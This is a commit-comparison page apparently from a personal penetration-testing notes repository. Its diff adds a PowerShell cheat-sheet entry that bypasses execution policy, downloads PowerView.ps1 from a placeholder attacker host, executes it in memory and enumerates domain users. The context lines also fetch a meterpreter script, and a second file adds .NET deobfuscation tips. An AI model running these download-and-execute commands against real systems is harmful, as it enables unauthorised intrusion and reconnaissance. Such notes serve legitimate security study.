Compare commits

...

2 Commits

Author SHA1 Message Date
Stefan Friese e597409caf bump 2022-04-20 00:03:51 +02:00
Stefan Friese d6c6127cb4 bump 2022-04-20 00:03:16 +02:00
2 changed files with 9 additions and 0 deletions

View File

@ -129,6 +129,11 @@ Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
```
* Webrequest and execute in one go
```sh
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
```
## Base64 Decode File
```
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))

View File

@ -0,0 +1,4 @@
# Deobfuscation
* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator
* In case of dotnet: Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well